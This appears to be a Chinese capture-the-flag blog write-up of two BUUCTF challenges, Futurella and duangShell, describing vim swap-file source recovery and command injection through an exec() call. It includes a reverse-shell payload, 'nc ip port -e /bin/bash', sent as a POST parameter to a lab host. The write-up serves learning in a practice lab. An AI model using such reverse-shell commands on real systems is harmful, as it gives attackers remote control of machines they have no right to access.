[BSidesCF 2019]Futurella

好久没看过这么简单的题目了,哇哇哇
整了个火星文,看不懂查看源代码[BUUCTF]第一天训练

[BUUCTF]第一天训练

[BJDCTF 2nd]duangShell

点进去发现是swp源码泄露
[BUUCTF]第一天训练
利用vim -r index.php.swp恢复文件
[BUUCTF]第一天训练
这里我知道了exec函数与system类似但是没有回显,所以我传入的参数girl_friend=print_r(scandir(dirname(__FILE__)))会没有显示
看了别人的wp,发现我们只能用反弹shell的方法了,根据提示
[BUUCTF]第一天训练
由于这题的环境靶机无法访问外网,所以需要一个内网靶机来做,这里就直接用了题目中推荐的Basic中的Linux Labs,由于这台靶机已经安装了lamp,已指出http服务,利用xshell连接主机
[BUUCTF]第一天训练
[BUUCTF]第一天训练

反弹姿势1(未成功)

[BUUCTF]第一天训练
[BUUCTF]第一天训练
开启
[BUUCTF]第一天训练
反弹shell
[BUUCTF]第一天训练
不知道为啥通不了迷惑???

反弹姿势2

post参数:nc ip port -e /bin/bash
[BUUCTF]第一天训练

[BUUCTF]第一天训练
这个靶机真垃圾
[BUUCTF]第一天训练

相关文章: